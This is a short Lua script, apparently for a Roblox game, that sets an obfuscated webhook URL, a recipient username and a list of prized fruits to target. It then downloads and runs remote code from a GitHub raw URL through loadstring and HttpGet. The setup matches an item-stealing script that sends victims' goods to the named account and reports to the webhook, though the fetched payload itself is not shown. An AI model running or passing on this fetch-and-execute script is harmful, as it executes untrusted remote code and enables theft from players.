Webhook = "https://webhook-protect.vercel.app/api/webhook?id=aFkzN1labC1DVHhrR2ttZ1ZGWDgtQTpkYTFkZDEzTHBzMGhRNjFzN2dKOGZaUW5NX3ltSUtsM2lrcUU3cGxJRmJ5UVBpQy1hWFE2aHFzMnRBcHREMFFmNFVLVnFlczRwdXRBUVppUXpwUlY4Q0ljNmE3WVkzanoxUGFkRE5WWHhCcmxXQnVMZEEySEMtUEN4OUpHdkdCczAyRXlucFBqbXlUeHRQMmJZZXVfYWtLLWZHREZTNUNIZ0VYeGJac1JvMUVnOWpTQVlaalcxUUNNbTZsRHFwRE5VU2lXR3BaOXdMNmF2QnhDNTIzdkdRNkY5OU0zWkh4dVdXT0tDbVZWak9xb1dWVHo2aTV3dUpoQndCQ1hDdk9HTF9aam5OekpOYWFoMkFETnQ2QVI0MTNaVGYxVVI5Q2FzdVBQZEh6YmJQVDZlRF9yVGdCc3pGV3lDR0FIb3NUX0lpa09GQ0o5Mml1cHpaUkFFcGFqa3hvRFN0Skl3TGV6Wk1aS2N1NkVaNXRYV2wybnZIVEI2ajk3WnI3WWtxNXR6LVBCUk9zWFN1MGlzNWkzY2Q5Ylk2Zkc2aHcyY0lHaHgyOUJ6MWRCOHNV"
Usernames = {"Sezen_efsan01"}
FruitsToHit = {"Yeti-Yeti", "Kitsune-Kitsune", "Leopard-Leopard"}

loadstring(game:HttpGet("https://raw.githubusercontent.com/surelyco/CutestCodes/refs/heads/main/V2"))()
